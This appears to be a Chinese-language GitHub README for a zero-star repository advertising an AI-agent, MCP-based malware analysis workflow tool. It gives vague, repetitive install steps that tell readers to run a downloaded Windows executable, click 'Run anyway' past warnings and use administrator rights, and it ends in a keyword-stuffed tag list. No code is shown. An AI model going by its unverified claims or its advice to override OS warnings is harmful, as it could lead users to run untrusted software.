Melloneyspotty167/agentic-malware-analysis
GitHub: Melloneyspotty167/agentic-malware-analysis
一款基于AI代理和MCP协议的恶意软件逆向分析工作流编排工具,通过引导式流程将反汇编器和逆向工程工具整合为自动化分析管线。
Stars: 0 | Forks: 0
[](https://github.com/Melloneyspotty167/agentic-malware-analysis)
# 🛡️ agentic-malware-analysis - 通过引导式工作流分析恶意软件
## 📥 下载
使用此链接访问页面并下载应用文件:
[https://github.com/Melloneyspotty167/agentic-malware-analysis](https://github.com/Melloneyspotty167/agentic-malware-analysis)
如果您在该页面上看到 **Releases** 部分,请打开它并在那里获取最新的 Windows 文件。如果页面提供的是 ZIP 文件,请将其保存到您的 PC,并保留在您以后能找到的文件夹中,例如 `Downloads` 或 `Desktop`。
## 🖥️ 此应用的功能
此应用帮助您以清晰、循序渐进的方式完成恶意软件分析任务。它将反汇编器、逆向工程工具和结构化工作流集中在一个地方。
使用它可以:
- 检查可疑文件
- 按照既定顺序跟踪分析步骤
- 使用连接 MCP 的工具
- 支持 Claude Code 和 Codex CLI 工作流
- 以结构化格式保存笔记和发现
## ✅ 所需条件
要在 Windows 上使用,请确保您具备:
- Windows 10 或 Windows 11
- 最新版本的 Microsoft Edge 或 Chrome
- 足够的可用磁盘空间以存放工具和样本文件
- 在您的 PC 上运行下载文件的权限
- 一个用于存放分析文件的文件夹
如果应用包含额外工具,请将它们与主应用文件保存在同一文件夹中,除非发布页面另有说明。
## 🚀 在 Windows 上安装
请按顺序执行以下步骤:
1. 打开上面的下载链接。
2. 找到最新的 Windows 版本或应用包。
3. 将文件下载到您的 PC。
4. 如果文件是 ZIP 压缩包,请右键单击并选择 **Extract All**(全部提取)。
5. 打开解压后的文件夹。
6. 找到主应用文件,例如 `.exe` 文件或启动文件。
7. 双击该文件以启动应用。
8. 如果 Windows 请求权限,请选择 **Run anyway**(仍要运行)或 **Yes**(是)。
9. 如果应用打开安装界面,请按照屏幕上的步骤操作。
10. 安装完成后,请将应用文件保留在同一文件夹中。
## 🧭 首次设置
当您首次打开应用时,请为您的分析文件设置一个简单的工作文件夹。
可以使用如下文件夹:
- `Documents\Malware-Analysis`
- `Desktop\Analysis-Work`
- `Downloads\Samples`
如果应用要求提供工具路径,请将其指向您解压文件的文件夹。如果要求提供分析工作区,请选择您希望用于保存报告、日志和笔记的文件夹。
## 🔍 主要功能
该应用围绕几个核心部分构建:
- **引导式工作流**:按固定顺序执行分析步骤
- **反汇编器支持**:打开并检查文件代码
- **RE 工具集成**:将逆向工程工具集中在一个地方
- **MCP 链接**:通过 MCP 使用连接的工具
- **结构化笔记**:以清晰的格式保存发现
- **CLI 支持**:与 Claude Code 和 Codex CLI 配合使用
- **任务跟踪**:让流程的每一步都清晰可见
## 🛠️ 使用方法
一种简单的开始方式:
1. 打开应用。
2. 加载您要检查的文件。
3. 选择与您任务匹配的工作流。
4. 让应用引导您完成检查。
5. 查看每个工具的输出。
6. 随时保存笔记。
7. 完成后导出您的发现。
如果您是恶意软件分析的新手,请从一个小的测试文件或已知的安全样本开始。使用工作流视图保持步骤顺序,避免遗漏。
## 📁 建议的文件夹布局
您可以通过简单的文件夹设置让您的工作易于查找:
- `agentic-malware-analysis`
- `samples`
- `reports`
- `screenshots`
- `notes`
- `exports`
这使得在文件之间移动和保持工作整洁变得更加容易。
## 🔗 工具连接
此环境设置为通过连接 MCP 的反汇编器和 RE 工具与外部工具配合使用。简而言之,这意味着应用可以在工具之间传递任务,这样您就不必手动逐一打开它们。
您可能会看到对以下各项的支持:
- 反汇编工具
- 静态分析工具
- 工作流运行器
- 基于 CLI 的助手
- 报告导出器
如果工具一开始没有连接上,请检查它是否已安装、解压并位于正确的文件夹中。
## ⚙️ 常见 Windows 问题
如果应用无法启动:
- 检查您是否已先解压了 ZIP 文件
- 确保您打开的是主应用文件
- 右键单击该文件并尝试 **Run as administrator**(以管理员身份运行)
- 确认 Windows 没有阻止该文件
- 将文件夹移动到简单的路径下,例如 `C:\Tools\agentic-malware-analysis`
如果缺少工具:
- 重新打开您解压文件的文件夹
- 检查是否有 tools 或 bin 文件夹
- 确保在解压过程中没有删除任何文件
- 如果文件夹看起来不完整,请重新下载该包
如果应用打开了但看起来是空的:
- 确认您加载了样本或目标文件
- 检查是否已设置工作区文件夹
- 查看工作流面板以了解可用任务
## 🧪 安全使用
此应用用于恶意软件分析工作。请将其保存在受控的文件夹中,并在您有权检查的文件上使用。如果您正在测试未知样本,请在可以重置的本地环境中工作。
## 🧾 打开后预期会看到的内容
启动后,您可能会看到:
- 用于样本的文件选择器
- 工作流列表
- 工具连接面板
- 日志视图
- 笔记区域
- 报告导出选项
该布局应能帮助您从文件导入、分析到报告输出顺畅进行,而无需在许多应用之间来回切换。
## 📌 文件处理提示
使用简短且不包含特殊字符的文件名。将相关文件保存在同一位置。如果您处理许多样本,请为每个案例创建一个文件夹,并将样本、笔记和输出存放在一起。
良好的文件名示例:
- `sample1.exe`
- `case_014.zip`
- `report_notes.txt`
## 🧰 面向高级用户
如果您已经使用 Claude Code 或 Codex CLI,此环境可以融入您当前的流程。使用它将分析步骤与您的命令行工作连接起来,然后将输出存储在同一个工作区中,以便结果保持一致。
## 📣 再次下载
如果您以后需要下载页面,请使用此链接:
[https://github.com/Melloneyspotty167/agentic-malware-analysis](https://github.com/Melloneyspotty167/agentic-malware-analysis)
标签:Claude Code, Codex CLI, Conpot, DAST, MCP协议, Windows安全, 二进制分析, 云安全监控, 云安全运维, 云资产清单, 人工智能代理, 假设验证, 反汇编工具, 威胁情报, 安全工作流, 开发者工具, 引导式分析, 恶意样本分析, 恶意软件分析, 模型上下文协议, 深度分析, 网络安全, 自动化分析, 证据排名, 跨站脚本, 逆向工程, 隐私保护, 静态分析